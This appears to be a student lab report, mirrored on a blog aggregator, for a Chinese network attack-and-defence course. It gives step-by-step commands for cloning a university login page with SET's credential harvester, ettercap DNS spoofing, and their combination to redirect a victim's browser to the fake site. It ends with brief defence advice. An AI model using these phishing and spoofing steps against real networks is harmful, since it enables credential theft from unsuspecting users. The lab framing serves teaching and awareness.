zoukankan      html  css  js  c++  java
  • 2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范

    2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范


    实验目标

    • 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有

    (1)简单应用SET工具建立冒名网站 (1分)

    (2)ettercap DNS spoof (1分)

    (3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站。(1.5分)

    (4)请勿使用外部网站做实验

    Exp 7.1 简单应用SET工具建立冒名网站

    • 首先使用vi编辑apache配置文件修改端口号
    • 查看80端口状态,如被占用需要kill占用它的进程
    • 开启Apache服务
    • 打开SET工具
    sudo vi /etc/apache2/ports.conf
    netstat -tupln | grep 80
    apachectl start
    setoolkit
    选择1,社会工程学攻击
    选择2,钓鱼网站攻击向量
    选择3,登陆密码截取攻击
    选择2,网站克隆
    

    • 输入kali的IP:192.168.153.135和要克隆的url:192.168.200.83/cas/login

    • 使用靶机(win2008)浏览器输入kali的IP:192.168.153.135

    • kali端响应,收到用户名和密码数据:


    Exp 7.2 ettercap DNS spoof

    • 修改kali网卡为混杂模式
    • 修改DNS缓存表
    ifconfig eth0 promisc
    vi /etc/ettercap/etter.dns
    
    • 添加新纪录后保存。即指定靶机通过DNS转换的域名和服务器IP:
      192.168.200.80/cas/login A 192.168.153.135

    • 打开ettercap

    ettercap -G 
    Sniff-->unified sniffing指定监听的网卡
    Hosts-->Scan for hosts扫描子网
    Hosts-->Hosts list查看子网主机列表
    

    • 将网关IP:192.168.153.2添加到Targert1,将靶机IP:192.168.153.1添加到Targert2:

    • Plugins-->Manage the plugins-->双击dns_spoof

    • start-->start sniffing开始嗅探

    • 靶机通过ping设定的域名,查看是否欺骗成功


    Exp 7.3 结合应用两种技术,用DNS spoof引导特定访问到冒名网站

    • 首先同实验第一步,克隆出一个假的教务处登陆网站。
    • 在实验二步骤中,将DNS缓存表中将该网站的IP改为kali的IP192.168.153.135,并开始dns_spoof
    • 靶机中直接访问该网站。发现输入www.baidu.com,却出现教务处的网站。

    实验感想和问题

    • 感想:网站克隆技术有好的方面也有坏的方面,很容易攻击访问者的电脑。所以以后遇到不安全的网站,尽量不要点进去,很有可能就连接到了一个钓鱼网站被盗用了信息。

    • (1)通常在什么场景下容易受到DNS spoof攻击

      答:不设防的点击链接时(例如朋友提供的,免费WIFI自动打开等)

    • (2)在日常生活工作中如何防范以上两攻击方法

      答:不轻易打开非官方渠道获得的链接;不能随便连wifi。

  • 相关阅读:
    多重共性和VIF检验
    类和对象
    哈希桶
    第9章 硬件抽象层:HAL
    第10章 嵌入式Linux的调试技术
    第8章 让开发板发出声音:蜂鸣器驱动
    第7章 LED将为我闪烁:控制发光二极管
    第6章 第一个Linux驱动程序:统计单词个数
    第5章 搭建S3C6410开发板的测试环境
    第四章:源代码的下载与编译
  • 原文地址:https://www.cnblogs.com/Miss-moon/p/10810784.html
Copyright © 2011-2022 走看看